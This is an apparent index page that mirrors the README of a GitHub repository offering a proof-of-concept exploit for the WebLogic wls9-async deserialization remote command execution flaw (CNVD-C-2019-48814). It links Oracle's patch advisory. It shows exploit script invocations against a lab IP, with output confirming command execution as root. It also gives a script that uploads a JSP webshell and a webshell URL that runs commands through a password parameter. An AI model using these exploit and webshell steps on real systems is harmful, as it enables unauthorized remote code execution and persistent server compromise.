Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/jas502n/cnvd-c-2019-48814
WebLogic wls9-async反序列化远程命令执行漏洞
https://github.com/jas502n/cnvd-c-2019-48814
Last synced: 9 days ago
JSON representation
WebLogic wls9-async反序列化远程命令执行漏洞
- Host: GitHub
- URL: https://github.com/jas502n/cnvd-c-2019-48814
- Owner: jas502n
- Created: 2019-04-24T12:24:48.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-05-26T13:36:18.000Z (over 5 years ago)
- Last Synced: 2024-08-01T09:23:04.296Z (3 months ago)
- Language: Python
- Size: 5.36 MB
- Stars: 244
- Watchers: 10
- Forks: 95
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CNVD-C-2019-48814
WebLogic wls9-async反序列化远程命令执行漏洞
### 回显poc for weblogic
### Patch update:
```
https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
```
### 漏洞复现:
```
http://10.10.20.166:7001/_async/AsyncResponseService
```
```
curl -i http://10.10.20.166:7001/_async/favicon.ico
```
## CNVD-C-2019-48814 Video
[](https://github.com/jas502n/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.mp4)
```
python CNVD-C-2019-48814.py -u http://10.10.20.166:7001 -p 1.txt
>>>>Common See:
write website favicon.ico
Don't Need RMI Server
http://10.10.20.166:7001/_async/favicon.ico
>>>>Request Success!
status_code:202
C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
root
```
## Use RMI
### CVE-2017-10271 No pactch
#### windows-linux-webshell
```
upadte: 自定义webshell名字,适用于windows or linux upload webshell
python async_webshell-all.py http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
```
#### resever_shell
#### command see
#### webshell
